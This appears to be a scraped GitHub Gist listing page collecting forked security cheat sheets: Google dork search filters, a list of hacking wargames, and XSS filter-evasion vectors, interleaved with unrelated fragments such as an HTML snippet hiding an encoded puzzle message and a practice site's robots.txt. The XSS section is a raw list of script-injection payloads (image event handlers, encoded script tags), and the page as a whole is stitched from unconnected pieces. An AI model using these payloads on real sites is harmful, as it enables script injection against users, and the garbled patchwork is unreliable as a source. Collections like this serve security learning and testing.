Skip to content

Instantly share code, notes, and snippets.

@purplebyteone
purplebyteone / GoogleDorking.md
Created December 18, 2021 23:56 — forked from sundowndev/GoogleDorking.md
Google dork cheatsheet

Google dork cheatsheet

Search filters

Filter Description Example
allintext Searches for occurrences of all the keywords given. allintext:"keyword"
intext Searches for the occurrences of keywords all at once or one at a time. intext:"keyword"
inurl Searches for a URL matching one of the keywords. inurl:"keyword"
allinurl Searches for a URL matching all the keywords in the query. allinurl:"keyword"
intitle Searches for occurrences of keywords in title all or one. intitle:"keyword"
<div class="text">
<!-- <img class="ie" src="https://i2.wp.com/freemasoninformation.com/wp-content/uploads/2014/05/all-seeing-eye-of-god.jpg?resize=796%2C1024" height="15%" width="10%"> -->
<!--<h2>c</h2>
<h1 class="undefined">W*** I w*** <span class="secret hex">84</span>o <span class="secret">r</span>**d of m<span class="secret">y</span> **fe
I<span class="secret">t</span> r*n* t<span class="secret">o</span>* <span class="secret">f</span>ast
so <span class="secret base">aW4=</span>si<span class="secret">d</span>e <span class="secret hex">77</span>y h<span class="secret base">ZQ==</span>art I <br><span class="dye">d*e</span><br>***ry **y.</h1> -->
<blockquote class="hy">Silence is the only space where the Spirit spreads its wings.</blockquote>
<!-- <p class="welcome"><a href="https://vk.com/digital_evidence" target="_blank" alt="Devil in details..."></a> &nbsp;</p> -->
<span class="word ">Undefined</span>
<span class="word ">says</span>
@purplebyteone
purplebyteone / list-of-hacking-games.md
Created September 30, 2019 10:30 — forked from fakhrullah/list-of-hacking-games.md
List of hacking game, wargame or capture the flag (CTF) for some one who want to learn hacking.

I am programmer who want to learn hacking. I start by playing online wargame. Here I list free online wargame available to anyone who want to learn hacking.

Available online to play

Need to download and deploy on own host

@purplebyteone
purplebyteone / xss-owasp-cheatsheet
Created August 11, 2019 00:12 — forked from sseffa/xss-owasp-cheatsheet
xss-owasp-cheatsheet
#
# https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
# based on the RSnake original http://ha.ckers.org/xss.html
# Retrieved on 2013-11-20
# Much of this wildly obsolete
#
# XSS Locator 2
'';!--"<XSS>=&{()}
@purplebyteone
purplebyteone / xss_vectors.txt
Created August 11, 2019 00:09 — forked from kurobeats/xss_vectors.txt
XSS Vectors Cheat Sheet
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))">
===One comment - one level===
https://www.hackthis.co.uk/robots.txt
User-agent: *
Allow: /
Disallow: /contact.php
Disallow: /inbox/
Disallow: /levels/
Disallow: /levels/extras/userpass.txt
Disallow: /users/